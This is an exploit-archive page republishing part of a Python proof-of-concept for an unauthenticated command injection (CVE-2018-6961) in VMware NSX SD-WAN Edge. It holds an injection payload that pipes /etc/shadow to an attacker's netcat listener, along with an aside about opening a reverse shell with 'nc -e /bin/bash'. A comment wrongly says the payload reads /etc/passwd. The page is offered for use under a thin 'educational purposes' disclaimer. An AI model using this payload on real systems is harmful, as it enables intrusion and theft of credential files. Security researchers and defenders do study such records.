Exploits / Vulnerability Discovered : 2018-07-02 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Vmware nsx sdwan edge < 3.1.2 command injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Critical Start
# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
# Vendor Homepage: https://www.vmware.com
# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html
# Version: 3.1.1
# CVE: CVE-2018-6961
This script will return execute whatever payload you placed within it.
Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
The command within this script will send stdout of commands to your netcat listener. Feel free to change :)
# Payload to be sent to the victim. Change to whatever you like!
# This payload will cat /etc/passwd from fictim and pipe it into a netcat connection to your listener giving you the contents of /etc/passwd
payload = "$(cat /etc/shadow |nc " + lhost + " " + lport + ")"